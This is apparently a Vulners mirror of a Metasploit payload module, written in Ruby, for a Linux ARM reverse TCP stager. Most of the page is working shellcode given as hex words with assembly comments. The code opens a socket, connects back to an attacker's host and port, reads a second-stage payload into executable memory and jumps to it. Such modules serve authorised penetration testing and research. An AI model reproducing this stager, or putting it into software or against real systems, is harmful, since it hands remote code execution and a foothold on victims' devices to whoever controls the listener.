Lucene search
+L

Linux dup2 Command Shell, Reverse TCP Stager

🗓️ 18 May 2013 02:52:10Reported by nemo <[email protected]>, tkmruType 
metasploit
 metasploit
🔗 www.rapid7.com👁 14 Views

Linux dup2 Command Shell, Reverse TCP Stage

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


###
#
# ReverseTcp
# ----------
#
# Linux reverse TCP stager.
#
###
module MetasploitModule

  CachedSize = 260

  include Msf::Payload::Linux::Armle::Prepends
  include Msf::Payload::Stager

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Reverse TCP Stager',
      'Description'   => 'Connect back to the attacker',
      'Author'        => ['nemo <nemo[at]felinemenace.org>', 'tkmru'],
      'License'       => MSF_LICENSE,
      'Platform'      => 'linux',
      'Arch'          => ARCH_ARMLE,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Stager'        =>
        {
          'Offsets' =>
            {
              'LPORT' => [ 242, 'n'    ],
              'LHOST' => [ 244, 'ADDR' ],
            },
          'Payload' =>
          [
            # Generated from external/source/shellcode/linux/armle/stager_sock_reverse.s
            0xe59f70f0,          #        ldr     r7, [pc, #240]    ; set 281(0x119) to r7
            0xe3a00002,          #        mov     r0, #2
            0xe3a01001,          #        mov     r1, #1
            0xe3a02006,          #        mov     r2, #6
            0xef000000,          #        svc     0x00000000        ; invoke socket
            0xe3500000,          #        cmp     r0, #0
            0xba000031,          #        blt     817c <failed>
            0xe1a0c000,          #        mov     ip, r0
            0xe2877002,          #        add     r7, r7, #2        ; set 283(0x11b) to r7
            0xe28f10c4,          #        add     r1, pc, #196      ; set first .word addr to r1
            0xe3a02010,          #        mov     r2, #16
            0xef000000,          #        svc     0x00000000        ; invoke connect
            0xe3500000,          #        cmp     r0, #0
            0xba00002a,          #        blt     817c <failed>
            0xe1a0000c,          #        mov     r0, ip
            0xe24dd004,          #        sub     sp, sp, #4
            0xe2877008,          #        add     r7, r7, #8        ; set 291(0x123) to r7
            0xe1a0100d,          #        mov     r1, sp
            0xe3a02004,          #        mov     r2, #4
            0xe3a03000,          #        mov     r3, #0
            0xef000000,          #        svc     0x00000000        ; invoke recv
            0xe3500000,          #        cmp     r0, #0
            0xba000021,          #        blt     817c <failed>
            0xe59d1000,          #        ldr     r1, [sp]
            0xe59f3094,          #        ldr     r3, [pc, #148]    ; set 0xfffff000 to r3
            0xe0011003,          #        and     r1, r1, r3
            0xe3a02001,          #        mov     r2, #1
            0xe1a02602,          #        lsl     r2, r2, #12
            0xe0811002,          #        add     r1, r1, r2        ; set 0x1000 to r1
            0xe3a070c0,          #        mov     r7, #192          ; set 192(0xC0) to r7
            0xe3e00000,          #        mvn     r0, #0            ; set 0xffffffff to r0
            0xe3a02007,          #        mov     r2, #7
            0xe59f3078,          #        ldr     r3, [pc, #120]    ; set r3 to 0x1022
            0xe1a04000,          #        mov     r4, r0
            0xe3a05000,          #        mov     r5, #0
            0xef000000,          #        svc     0x00000000        ; invoke mmap2
            0xe3700001,          #        cmn     r0, #1
            0x0a000012,          #        beq     <failed>
            0xe2877063,          #        add     r7, r7, #99       ; set 291(0x123) to r7
            0xe1a01000,          #        mov     r1, r0
            0xe3a03000,          #        mov     r3, #0
                                 #  loop:
            0xe1a0000c,          #        mov     r0, ip
            0xe59d2000,          #        ldr     r2, [sp]
            0xe2422ffa,          #        sub     r2, r2, #1000
            0xe58d2000,          #        str     r2, [sp]
            0xe3520000,          #        cmp     r2, #0
            0xda000004,          #        ble     80fc <last>
            0xe3a02ffa,          #        mov     r2, #1000
            0xef000000,          #        svc     0x00000000        ; invoke recv
            0xe3500000,          #        cmp     r0, #0
            0xba000005,          #        blt     817c <failed>
            0xeafffff4,          #        b       80dc <loop>
                                 #  last:
            0xe2822ffa,          #        add     r2, r2, #1000
            0xef000000,          #        svc     0x00000000        ; invoke recv
            0xe3500000,          #        cmp     r0, #0
            0xba000000,          #        blt     817c <failed>
            0xe1a0f001,          #        mov     pc, r1
                                 #  failed:
            0xe3a07001,          #        mov r7, #1
            0xe3a00001,          #        mov r0, #1
            0xef000000,          #        svc 0x00000000
            0x5c110002,          #  .word   0x5c110002
            0x0100007f,          #  .word   0x0100007f
            0x00000119,          #  .word   0x00000119
            0xfffff000,          #  .word   0xfffff000
            0x00001022           #  .word   0x00001022
          ].pack("V*")

        }
      ))
  end

def handle_intermediate_stage(conn, payload)

    print_status("Transmitting stage length value...(#{payload.length} bytes)")

    address_format = 'V'

    # Transmit our intermediate stager
    conn.put( [ payload.length ].pack(address_format) )

    return true
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Jan 2025 20:26Current
7.3High risk
Vulners AI Score7.3
14